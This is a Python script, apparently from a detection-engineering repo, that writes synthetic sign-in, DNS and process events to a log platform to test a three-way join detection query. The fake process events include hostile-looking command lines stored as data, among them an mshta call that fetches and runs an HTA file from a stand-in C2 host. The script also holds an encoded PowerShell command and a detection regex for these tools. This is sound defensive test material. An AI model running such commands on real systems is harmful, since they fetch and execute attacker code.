mirror of
https://github.com/marcredhat/kql
synced 2026-06-08 13:23:58 +00:00
221 lines
7.9 KiB
Python
221 lines
7.9 KiB
Python
"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
|
|
|
|
identity sign_in failures x suspicious DNS x suspicious process_start
|
|
|
|
Joined on (user_name) and (host). Events are spread across the last 4 hours.
|
|
"""
|
|
from __future__ import annotations
|
|
|
|
import random
|
|
import time
|
|
from pathlib import Path
|
|
import sys
|
|
|
|
ROOT = Path(__file__).resolve().parent
|
|
sys.path.insert(0, str(ROOT))
|
|
from sdl_client import add_events, power_query # noqa: E402
|
|
|
|
NOW_MS = int(time.time() * 1000)
|
|
WINDOW_MS = 4 * 60 * 60 * 1000 # 4h
|
|
|
|
# --- Personas that will land in ALL 3 streams (these will join) --------------
|
|
JOIN_TARGETS = [
|
|
# (user, host)
|
|
("alice.smith", "wks-alice-01"),
|
|
("bob.jones", "wks-bob-02"),
|
|
("carol.nguyen", "wks-carol-03"),
|
|
]
|
|
|
|
# Users that only fail logins (no DNS/proc match) → in failed-only
|
|
NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
|
|
|
|
# Hosts that have suspicious procs but no DNS hit → noise on proc side
|
|
NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
|
|
|
|
SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
|
|
BENIGN_DOMAINS = ["microsoft.com", "google.com", "github.com"]
|
|
SUSPECT_CMDS = [
|
|
"powershell.exe -enc SQBFAFgAIA==",
|
|
"rundll32.exe shell32.dll,Control_RunDLL",
|
|
"mshta.exe http://c2.example.net/x.hta",
|
|
]
|
|
BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
|
|
|
|
|
|
def rand_ts() -> str:
|
|
"""Random ns-epoch timestamp string within the last 4h."""
|
|
ms = NOW_MS - random.randint(0, WINDOW_MS - 1)
|
|
return str(ms * 1_000_000)
|
|
|
|
|
|
def evt(ts_ns: str, attrs: dict) -> dict:
|
|
return {"ts": ts_ns, "sev": 3, "attrs": attrs, "thread": "T1"}
|
|
|
|
|
|
def gen_failed_signins() -> list[dict]:
|
|
out = []
|
|
# Users in JOIN_TARGETS get many failures (so they "stand out")
|
|
for user, _ in JOIN_TARGETS:
|
|
for _ in range(random.randint(8, 15)):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "identity",
|
|
"dataSource.vendor": "azure-ad",
|
|
"activity_name": "sign_in",
|
|
"status": "failure",
|
|
"user.name": user,
|
|
"src_endpoint.ip": f"203.0.113.{random.randint(2,254)}",
|
|
}))
|
|
# Noise: failed-only users
|
|
for user in NOISE_FAILED_USERS:
|
|
for _ in range(random.randint(2, 6)):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "identity",
|
|
"dataSource.vendor": "azure-ad",
|
|
"activity_name": "sign_in",
|
|
"status": "failure",
|
|
"user.name": user,
|
|
}))
|
|
# Some successes (should be filtered out by status='failure')
|
|
for user, _ in JOIN_TARGETS:
|
|
for _ in range(3):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "identity",
|
|
"dataSource.vendor": "azure-ad",
|
|
"activity_name": "sign_in",
|
|
"status": "success",
|
|
"user.name": user,
|
|
}))
|
|
return out
|
|
|
|
|
|
def gen_dns() -> list[dict]:
|
|
out = []
|
|
for user, host in JOIN_TARGETS:
|
|
# suspicious DNS for these users on their hosts
|
|
for _ in range(random.randint(3, 6)):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "network",
|
|
"dataSource.vendor": "zeek",
|
|
"activity_name": "dns_query",
|
|
"user.name": user,
|
|
"device.hostname": host,
|
|
"dns.question.name": random.choice(SUSPECT_DOMAINS),
|
|
}))
|
|
# benign DNS noise from same users
|
|
for _ in range(5):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "network",
|
|
"dataSource.vendor": "zeek",
|
|
"activity_name": "dns_query",
|
|
"user.name": user,
|
|
"device.hostname": host,
|
|
"dns.question.name": random.choice(BENIGN_DOMAINS),
|
|
}))
|
|
# Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
|
|
for user in ["greg.wu", "helen.park"]:
|
|
for _ in range(3):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "network",
|
|
"dataSource.vendor": "zeek",
|
|
"activity_name": "dns_query",
|
|
"user.name": user,
|
|
"device.hostname": f"wks-{user.split('.')[0]}-99",
|
|
"dns.question.name": random.choice(SUSPECT_DOMAINS),
|
|
}))
|
|
return out
|
|
|
|
|
|
def gen_process() -> list[dict]:
|
|
out = []
|
|
for _, host in JOIN_TARGETS:
|
|
for _ in range(random.randint(4, 8)):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "process",
|
|
"dataSource.vendor": "sentinelone",
|
|
"activity_name": "process_start",
|
|
"device.hostname": host,
|
|
"process.cmd_line": random.choice(SUSPECT_CMDS),
|
|
}))
|
|
# benign procs on the same hosts
|
|
for _ in range(5):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "process",
|
|
"dataSource.vendor": "sentinelone",
|
|
"activity_name": "process_start",
|
|
"device.hostname": host,
|
|
"process.cmd_line": random.choice(BENIGN_CMDS),
|
|
}))
|
|
# Noise: suspicious procs on hosts that don't appear in DNS stream
|
|
for host in NOISE_PROC_HOSTS:
|
|
for _ in range(3):
|
|
out.append(evt(rand_ts(), {
|
|
"dataSource.category": "process",
|
|
"dataSource.vendor": "sentinelone",
|
|
"activity_name": "process_start",
|
|
"device.hostname": host,
|
|
"process.cmd_line": random.choice(SUSPECT_CMDS),
|
|
}))
|
|
return out
|
|
|
|
|
|
def chunked(seq: list, n: int):
|
|
for i in range(0, len(seq), n):
|
|
yield seq[i:i + n]
|
|
|
|
|
|
def main() -> None:
|
|
random.seed(42)
|
|
events = gen_failed_signins() + gen_dns() + gen_process()
|
|
random.shuffle(events)
|
|
print(f"Generated {len(events)} events across the last 4h")
|
|
|
|
sent = 0
|
|
for batch in chunked(events, 200):
|
|
r = add_events(batch, session_info={
|
|
"serverHost": "join-demo",
|
|
"logfile": "join-demo.jsonl",
|
|
"parser": "json",
|
|
})
|
|
if r.get("status") != "success":
|
|
raise RuntimeError(f"addEvents failed: {r}")
|
|
sent += len(batch)
|
|
print(f" ingested {sent}/{len(events)}")
|
|
time.sleep(0.25)
|
|
print(f"Done. {sent} events ingested.")
|
|
|
|
# Quick verification: run the user's PowerQuery against last 4h
|
|
pq = r'''| join
|
|
failed = (
|
|
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
|
|
| columns user_name = user.name
|
|
| group failed_signins = count() by user_name
|
|
),
|
|
dns = (
|
|
dataSource.category = 'network' AND activity_name = 'dns_query'
|
|
AND dns.question.name matches "(c2|suspect)\.example\."
|
|
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
|
|
),
|
|
proc = (
|
|
dataSource.category = 'process' AND activity_name = 'process_start'
|
|
AND process.cmd_line matches "(powershell|rundll32|mshta)"
|
|
| columns host = device.hostname, cmd_line = process.cmd_line
|
|
)
|
|
on failed.user_name = dns.user_name, dns.host = proc.host'''
|
|
|
|
print("\nWaiting 20s for SDL indexing, then running the join...")
|
|
time.sleep(20)
|
|
res = power_query(pq, start_time="4h")
|
|
if isinstance(res, dict):
|
|
matches = res.get("matches") or res.get("data") or res.get("results")
|
|
print(f"PowerQuery response keys: {list(res.keys())}")
|
|
if matches is not None:
|
|
print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
|
|
else:
|
|
print(res)
|
|
else:
|
|
print(res)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|